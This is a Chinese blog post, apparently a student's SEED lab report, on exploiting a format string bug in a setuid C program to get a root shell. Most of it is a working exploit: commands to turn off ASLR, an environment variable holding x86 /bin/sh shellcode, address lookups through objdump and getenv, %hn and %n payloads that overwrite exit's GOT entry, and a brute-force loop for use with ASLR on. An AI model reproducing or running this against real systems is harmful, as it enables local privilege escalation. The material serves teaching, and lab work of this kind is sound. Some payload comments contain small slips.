软件安全实验——lab4(格式化字符串2:修改内存地址运行shellcode获取root权限)

最新推荐文章于 2023-05-25 22:24:47 发布
最新推荐文章于 2023-05-25 22:24:47 发布
阅读量897 收藏 3
点赞数 1
分类专栏: # 软件安全实验 # 专题实验(Seed Lab) 文章标签: linux shell c语言 printf 格式化字符串
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Onlyone_1314/article/details/118961001
版权

Format-String后续的一些分析,有些步骤、利用细节没看懂的可以参考:
软件安全实验——lab4后记(格式化字符串实验原理、漏洞利用过程逐步分析)
最新的格式化字符串漏洞实验:软件安全实验——lab4 Format String Vulnerability Lab(格式化字符串漏洞实验最新版——2020年1月12日更新)

目录标题

Lab4 Format-String Vulnerability Lab (2)

Format string这个lab分两节课,第二节课的内容为:

Source code:

/*
* 如果获得环境变量的程序和攻击的程序的文件名长度不一样,环境变量的地址
* 会发生偏移。因此,要么令两个程序的文件名长度相等(推荐),要么考虑偏
* 移来计算环境变量地址。
* gcc -z execstack -o got got.c
*/
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) 
{
	char buf[1024];

	strncpy(buf, argv[1], sizeof(buf) - 1);
	printf(buf);  //没有格式化参数%s,可以输入地址
	puts("done");
	exit(0);
}

利用root把上面这段代码编译并且suid,然后普通用户执行它,要求就是成功获得root shell。
可以参考formatstring-1.2.pdf。

  上面的代码在调用exit(0)函数时,使用的是root权限,想要获得root权限,在这个实验中我们就要通过修改字符串的内存地址,改变程序的运行逻辑,把exit()函数的地址改成shellcode的地址,让程序运行shellcode。
  如果获得环境变量shellcode地址的程序和攻击的程序的文件名长度不一样,那么shellcode对于它们两个程序的地址也会相差几个字节。

一、获得环境变量的程序和攻击的程序的文件名长度不一样

Root权限关闭alsr:

sudo sysctl -w kernel.randomize_va_space=0

在这里插入图片描述

(1)定义一个环境变量EGG存放shellcode

export EGG=$(python -c "print '\x90'*1000 + '\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80'")

在这里插入图片描述

// \x90*1000设置了1000个指令雪橇,可以提高命中运行shellcode的概率

(2)获取shellcode的地址

#include <stdio.h>
#include <stdlib.h>
int main(void)
{
printf("Egg address: %p ",getenv("EGG"));
}

在这里插入图片描述

//EGG的地址为0xbffff4ac

(3)查找exit函数的地址

objdump -R got(显示文件的动态重定位入口)

在这里插入图片描述

//从截图中可以找到exit函数的地址从0804a00c开始的

(4)1、用%x找到printf()中参数在栈中的位置是11

./got AAAA,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,

在这里插入图片描述

(5)将exit函数的地址修改为shellcode的地址

./vulp $(printf "\x0e\xa0\x04\x08\x0c\xa0\x04\x08")%49143x%11\$hn%12831x%12\$hn
其中,49143=0xbfff-8,8是前面\x0a\xa0\x04\x08\x0e\xa0\x04\x08的长度
12831=0xf4ac-0xbfff

11$是指定%hn写入第11个位置,也就是参数在栈中的位置,就不用多个%x来控制位置了
这样,脚本就会分两次在0804a00c的位置写上bfff,在0804a00e的位置写上f4ac
在这里插入图片描述
在这里插入图片描述

二、令两个程序的文件名长度相等(推荐)

编译一个文件名长度相同的,命名为./getenv,并设为suid程序。
它和漏洞程序./string的文件名长度相同,这样环境变量EGG存放的shellcode的地址对于它们是相同,就不用像之前再添加雪橇x90了。

(1)定义一个环境变量EGG存放shellcode

export EGG=$(python -c "print '\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80'")

在这里插入图片描述

两个程序的文件名长度相等,不用像之前再添加雪橇x90了来提高命中率

(2)获取shellcode的地址

在这里插入图片描述

地址0xbfff f594

(3)攻击

给连续的0804a00c~e地址用%hn分两次写入2个值的攻击脚本:./string $(printf "\x0e\xa0\x04\x08\x0c\xa0\x04\x08")%49143x%11\$hn%13717x%12\$hn
其中,49143=0xbfff-8,8是前面\x0a\xa0\x04\x08\x0e\xa0\x04\x08的长度
13717=0xf594-0xbfff
11\$是指定%hn写入第11个位置,也就是参数在栈中的位置,就不用多个%x来控制位置了
这样,脚本就会分两次在0804a00c的位置写上bfff,在0804a00e的位置写上f594
在这里插入图片描述

这是因为没有setuid权限

Sudo chmod 4755 string

之后
在这里插入图片描述

给连续的0804a00c~f地址用%n分4次写入四个值的攻击脚本:(./string $(printf "x0c\xa0\x04\x08\x0d\xa0\x04\x08\x0e\xa0\x04\x08\x0f\xa0\x04\x08")%156x%11\$n%69x%12\$n%14x%13\$n%192x%14\$n)

三、Root权限开启alsr:sudo sysctl -w kernel.randomize_va_space=2

#!/bin/bash
while true
do
./vulprr $(printf "\x0e\xa0\x04\x08\x0c\xa0\x04\x08")%49143x%11\$hn%13831x%12\$hn
done

在这里插入图片描述

脚本启动后,大概三分钟后出现了结果。
在这里插入图片描述

大灬白
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux x64 shellcode,栈溢出攻击系列:shellcodelinux x86 64位攻击获得root权限(二)shellcode...
weixin_42386033的博客
05-12 505
shellcode 是一组指令opcode, 是可以被程序运行,因为shellcode是要直接操作寄存器和函数,所以opcode 必须是十六进制的形式。既然是攻击,那shellcode 主要的目的是调用系统函数,而在x86下 在linux下有两种方式。第一种是通过直接调用中断 int 0x80进入内核态,从而达到调用目的。第二种是通过调用libc里syscall(64位)和sysenter(32位...
格式化字符串任意地址写入、函数指针执行shellcode——攻防世界string复现及知识点简述
独沐晨霖
08-24 1045
文章目录原题复现——攻防世界string漏洞分析攻击思路exp要注意的小细节 原题复现——攻防世界string 漏洞分析 题目去除了符号表,简单分析即可还原函数功能,用ida改名即可 先进行基础检查,是64位程序,未开启PIE main函数中会给出v3[0]和v3[1]的地址 游戏开始需要输入角色名称,无利用点 go_east函数,没有可以利用的地方,必须输east才能继续游戏 许愿函数,读入用户输入地址以及format,可以结合main函数给我们的地址进行任意地址写利用 .
栈溢出攻击系列:shellcodelinux x86 64位攻击获得root权限(六)固定地址的栈溢出攻击
沧海一粟
02-23 2871
栈溢出攻击系列:shellcodelinux x86 64位攻击获得root权限(六)固定地址的栈溢出攻击
栈溢出攻击系列:shellcodelinux x86 64位攻击获得root权限(七)利用寄存器攻击
沧海一粟
02-23 3328
栈溢出攻击系列:shellcodelinux x86 64位攻击获得root权限(七)利用寄存器攻击
Shell脚本切换root用户或获取root权限
热门推荐
大话家的博客
03-10 2万+
前言 需求:Shell脚本不能通过root用户执行,只能通过普通用户执行。但是脚本中的某些命令需要时root权限。 想法:在执行需要root权限的命令时切换到root用户 或者 拿到root权限。 切换root用户 1、安装expect yum install -y expect 2、编写脚本 (3条消息) 解决linux下sudo更改文件权限报错xxxis not in the sudoers file. This incident will be reported._心之所向,一如既
fsef:格式化字符串漏洞利用框架(是否继续!)
05-07
使用此脚本可以轻松生成和利用格式字符串。 #!/usr/bin/python # coding=utf-8 from fsef import RemoteFsef shellcode = " \x1c \xa8 \x04 \x08 \x6a \x31 \x58 \x99 \xcd \x80 \x89 \xc3 \x89 \xc1 \x6a \x46 " ...
东南大学网络空间安全实验基础——缓冲区溢出漏洞实验
07-07
东南大学网络空间安全实验基础——缓冲区溢出漏洞实验实验报告的主要目的是了解缓冲区溢出漏洞的原理和实验过程。缓冲区溢出漏洞是一种常见的安全漏洞,攻击者可以通过溢出缓冲区来 inject恶意代码,从而控制...
shellcode转换字符串
07-18
shellcode转换字符串
第六十八课:基于Ruby内存加载shellcode第一季1
08-03
基于Ruby内存加载shellcode第一季 本资源是一个关于APT攻击与防御的教程,专门介绍基于Ruby内存加载shellcode的技术。该教程着重于msf无文件渗透的基础过渡,并为msf插件编写做基础过渡。 Ruby shellcode 生成 ...
alpha2 shellcode加密(转字符串)VC2008工程
11-23
国外大牛开发的把shellcode全部转为字符串并且能正常运行的加密码算法,非常牛,因为网络上很难找到,本来通过收集网络上的alpha2算法片段拼凑出来的完整版,听说有alpha3了但感觉这个够用了,特来分享我的百度博客:...
shellcode内存定位
qq_44119514的博客
02-23 619
shellcode内存定位基本方法 引入:今天被抛出一个问题 最开始一看,我就不明白了。但是却令我想起之前我写的一篇《shellcode编码之异或》,这篇文章提及到了两种解密子,而第二种就与今天的主题有关!当时我没有做过详细的解释与分析(主要是因为我当时估计原理没有弄懂,而是做了简单的引入),趁着今天脑袋还清醒着,赶紧记录! 再引入: 这段话似乎和我们今天的问题不相关,一个...
pwn刷题num26-----格式化字符串漏洞实现任意地址修改
tbsqigongzi的博客
04-27 454
BUUCTF-PWN-[第五空间2019 决赛]PWN5 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 开启canary保护-----栈溢出需绕过canary 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 程序运行后首先输入一个name 然后输入密码(passwd) 最后fail ida看一下伪代码 观察主函数,发现格式化字符串漏洞 printf(&buf);
格式化字符漏洞
最新发布
IT_huanhuan的博客
05-25 1112
格式化字符串是由普通字符(包括%)和转换规则构成的字符序列。普通字符被原封不动地复制到输出流中。转换规则根据与实参对应的转换指示符对其进行转换,然后将结果写入到输出流中。转换规则由可选的部分和必选部分组成。其中只有转换指示符type是必选部分,用来表示转换类型。用 printf() 为例,它的第一个参数就是格式化字符串 :“Color %s,Number %d,Float %4.2f”然后 printf 函数会根据这个格式化字符串来解析对应的其他参数。
格式化串漏洞
cyynid的博客
02-25 837
例如,prinf就是一个使用格式化串进行标准输出的函数,其参数包含两部分:printf 的第一个参数是格式化串,在下面例子就是"a=%d,b=%d",其中%d就是用于格式化输出的控制符;修改后,printf的参数不包括a,b,未能在函数调用时将其入栈,所以当 printf在栈上取与格式化控制符%d相对应的变量时,就不能找到a、b,而是错误地把栈上其他数据当做a、b的值进行了输出。printf函数进行格式化输出时,会根据格式化串中的格式化控制符在栈上取相应的参数,按照所需格式进行输出。
32位格式化字符串漏洞实现任意地址内存覆盖
z2876563的博客
08-11 1104
32位格式化字符串漏洞实现任意地址内存覆盖 原理 int i; printf("AAAA%n",&i) 此时i=4 漏洞利用例子 比如想将2写入0xffffcd28。则构造payload"AA%15nA"+p32(0xffffcd28),开头AA即可将=地址0xffffcd28内容赋值为2,nA"+p32(0xffffcd28),开头AA即可将=地址0xffffcd28内容赋值为2,%15nA"+p32(0xffffcd28),开头AA即可将=地址0xffffcd28内容赋值为2,n5个字节,为了
栈溢出攻击系列:shellcodelinux x86 64位攻击获得root权限(三)linux下进程中的多用户
沧海一粟
02-23 3005
栈溢出攻击系列:shellcodelinux x86 64位攻击获得root权限(三)linux下进程中的多用户
漏洞挖掘——实验4 Format String Vulnerability Lab
一半西瓜的博客
04-16 2688
题目 Lab Format String Vulnerability Lab Pre 1、 (选做)Memory management The iOS _MALLOC(size_t size, int type, int flags) function allocates size bytes on the heap. Internally blocks are represente...
一篇文章搞懂格式化字符串漏洞
qq_42988973的博客
05-20 3880
文章目录0x00 序言0x01 格式化字符串0x02 printf()函数0x03 格式化字符串漏洞利用任意内存读取任意内存修改 0x00 序言 刚学pwn,做了两道攻防世界的pwn新手训练,真的是啥也不会,第一道题是连上就有flag我都不知道咋连,就菜到这种地步。一个格式化字符串漏洞看了一天。看了很多博客,最后终于弄明白了,感觉很多博客都对新手不是那么友好,刚学完,总结梳理一下,便于复习。也希望自己写的能帮到其他像我一样刚开始学的小白更快更清楚的明白格式化字符串漏洞。 0x01 格式化字符串 格式化字符串
格式化字符串漏洞写入大地址函数
RobinZZX的博客
07-05 517
def fmt(prev, word, index): if prev < word: result = word - prev fmtstr = "%" + str(result) + "c" elif prev == word: result = 0 else: result = 256 + word...
什么是格式化字符串漏洞
05-11
格式化字符串漏洞是一种常见的安全漏洞,存在于应用程序中使用格式化字符串函数(例如printf、sprintf等)时,未正确处理用户提供的输入数据而导致的漏洞。攻击者可以通过输入特定的格式化字符串修改应用程序的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值